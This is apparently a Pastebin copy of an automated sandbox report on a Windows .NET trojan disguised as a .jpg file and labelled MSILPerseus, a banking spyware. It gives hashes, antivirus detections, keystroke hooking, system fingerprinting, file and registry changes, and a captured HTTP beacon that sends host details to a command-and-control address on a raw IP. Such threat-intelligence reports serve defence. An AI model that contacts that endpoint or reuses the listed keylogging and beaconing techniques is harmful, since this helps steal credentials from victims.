paladin316

Exes_6d513eeb87ed972660bcb1c12d96e30f_jpg_2019-07-10_10_30.txt

Jul 10th, 2019
2,157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.13 KB | None | 0 0
  1.  
  2. * MalFamily: "Msilperseus"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_6d513eeb87ed972660bcb1c12d96e30f.jpg"
  7. * File Size: 3124224
  8. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  9. * SHA256: "38050f32fdfae31c86834a3e10023a6fc3f735a4bb03ed701228e15ce2a6cea8"
  10. * MD5: "6d513eeb87ed972660bcb1c12d96e30f"
  11. * SHA1: "159a92084c4807534fedfe3cba2376efb78ac00c"
  12. * SHA512: "b213a2a122ec08c763ac747259bc1c68fd4ba06f0f9c1056e3847e93bd4a4e61f14498e7c9ec6b2e22bcd7d98ba0507fec4aa53fa6fd9f29a9899b12915547b2"
  13. * CRC32: "CC326425"
  14. * SSDEEP: "49152:753wBUHQ0j5dZVlABGNR4mwpwNPocZV4HnIBemOnv8Uo+:dgBUHQkvXaPmdUIBnOnk"
  15.  
  16. * Process Execution:
  17. "Exes_6d513eeb87ed972660bcb1c12d96e30f.jpg",
  18. "vbc.exe",
  19. "cvtres.exe",
  20. "vbc.exe",
  21. "cvtres.exe",
  22. "svchost.exe",
  23. "WmiPrvSE.exe"
  24.  
  25.  
  26. * Executed Commands:
  27. "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe\" /noconfig @\"C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.cmdline\"",
  28. "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe\" /noconfig @\"C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.cmdline\"",
  29. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RES5036.tmp\" \"C:\\Users\\user\\AppData\\Local\\Temp\\vbc5025.tmp\"",
  30. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  31. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RES85FC.tmp\" \"C:\\Users\\user\\AppData\\Local\\Temp\\vbc85FB.tmp\""
  32.  
  33.  
  34. * Signatures Detected:
  35.  
  36. "Description": "Creates RWX memory",
  37. "Details":
  38.  
  39.  
  40. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  41. "Details":
  42.  
  43. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  44.  
  45.  
  46. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  47.  
  48.  
  49. "suspicious_request": "http://34.238.151.233/AZL/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3"
  50.  
  51.  
  52.  
  53.  
  54. "Description": "Performs some HTTP requests",
  55. "Details":
  56.  
  57. "url": "http://34.238.151.233/AZL/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "The binary likely contains encrypted or compressed data.",
  63. "Details":
  64.  
  65. "section": "name: .text, entropy: 7.72, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0029e400, virtual_size: 0x0029e364"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Sniffs keystrokes",
  71. "Details":
  72.  
  73. "SetWindowsHookExW": "Process: Exes_6d513eeb87ed972660bcb1c12d96e30f.jpg(940)"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
  79. "Details":
  80.  
  81.  
  82. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  83. "Details":
  84.  
  85. "MicroWorld-eScan": "Gen:Variant.MSILPerseus.151695"
  86.  
  87.  
  88. "FireEye": "Gen:Variant.MSILPerseus.151695"
  89.  
  90.  
  91. "ALYac": "Gen:Variant.MSILPerseus.151695"
  92.  
  93.  
  94. "Arcabit": "Trojan.MSILPerseus.D2508F"
  95.  
  96.  
  97. "BitDefender": "Gen:Variant.MSILPerseus.151695"
  98.  
  99.  
  100. "Avast": "Win32:Malware-gen"
  101.  
  102.  
  103. "Ad-Aware": "Gen:Variant.MSILPerseus.151695"
  104.  
  105.  
  106. "Emsisoft": "Gen:Variant.MSILPerseus.151695 (B)"
  107.  
  108.  
  109. "DrWeb": "Trojan.DownLoader29.34782"
  110.  
  111.  
  112. "GData": "Gen:Variant.MSILPerseus.151695"
  113.  
  114.  
  115. "ESET-NOD32": "a variant of MSIL/Spy.Banker.ES"
  116.  
  117.  
  118. "SentinelOne": "DFI - Suspicious PE"
  119.  
  120.  
  121. "AVG": "Win32:Malware-gen"
  122.  
  123.  
  124. "Cybereason": "malicious.b87ed9"
  125.  
  126.  
  127. "CrowdStrike": "win/malicious_confidence_80% (W)"
  128.  
  129.  
  130.  
  131.  
  132. "Description": "Collects information to fingerprint the system",
  133. "Details":
  134.  
  135.  
  136.  
  137. * Started Service:
  138.  
  139. * Mutexes:
  140. "Global\\CLR_CASOFF_MUTEX",
  141. "Global\\.net clr networking"
  142.  
  143.  
  144. * Modified Files:
  145. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  146. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.tmp",
  147. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.0.vb",
  148. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.dll",
  149. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.cmdline",
  150. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.out",
  151. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.err",
  152. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences",
  153. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Local State",
  154. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.tmp",
  155. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.0.vb",
  156. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.dll",
  157. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.cmdline",
  158. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.out",
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.err",
  160. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc5025.tmp",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\RES5036.tmp",
  162. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  163. "\\??\\PIPE\\wkssvc",
  164. "\\??\\PIPE\\srvsvc",
  165. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc85FB.tmp",
  166. "C:\\Users\\user\\AppData\\Local\\Temp\\RES85FC.tmp"
  167.  
  168.  
  169. * Deleted Files:
  170. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.out",
  171. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.pdb",
  172. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.err",
  173. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.tmp",
  174. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.0.vb",
  175. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.cmdline",
  176. "C:\\Users\\user\\AppData\\Local\\Temp\\2rjbq-nt.dll",
  177. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences",
  178. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Local State",
  179. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.0.vb",
  180. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.dll",
  181. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.cmdline",
  182. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.tmp",
  183. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.out",
  184. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.pdb",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\yepptztm.err",
  186. "C:\\Users\\user\\AppData\\Local\\Temp\\RES5036.tmp",
  187. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc5025.tmp",
  188. "C:\\Users\\user\\AppData\\Local\\Temp\\RES85FC.tmp",
  189. "C:\\Users\\user\\AppData\\Local\\Temp\\vbc85FB.tmp"
  190.  
  191.  
  192. * Modified Registry Keys:
  193. "HKEY_CURRENT_USER\\DWM",
  194. "HKEY_CURRENT_USER\\DWM\\COUNT",
  195. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32",
  196. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\EnableFileTracing",
  197. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\EnableConsoleTracing",
  198. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\FileTracingMask",
  199. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\ConsoleTracingMask",
  200. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\MaxFileSize",
  201. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\Exes_6d513eeb87ed972660bcb1c12d96e30f_RASAPI32\\FileDirectory"
  202.  
  203.  
  204. * Deleted Registry Keys:
  205.  
  206. * DNS Communications:
  207.  
  208. * Domains:
  209.  
  210. * Network Communication - ICMP:
  211.  
  212. * Network Communication - HTTP:
  213.  
  214. "count": 1,
  215. "body": "",
  216. "uri": "http://34.238.151.233/AZL/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3",
  217. "user-agent": "",
  218. "method": "GET",
  219. "host": "34.238.151.233",
  220. "version": "1.1",
  221. "path": "/AZL/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3",
  222. "data": "GET /AZL/PostaSatanas.php?plug=NAO&GBS=&SYS=Microsoft%20Windows%207%20Enterprise%20N%20&USERPC=user%20-%20Host&AVS=&NAV=chrome&ORI=1.3 HTTP/1.1\r\nHost: 34.238.151.233\r\nConnection: Keep-Alive\r\n\r\n",
  223. "port": 80
  224.  
  225.  
  226.  
  227. * Network Communication - SMTP:
  228.  
  229. * Network Communication - Hosts:
  230.  
  231. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment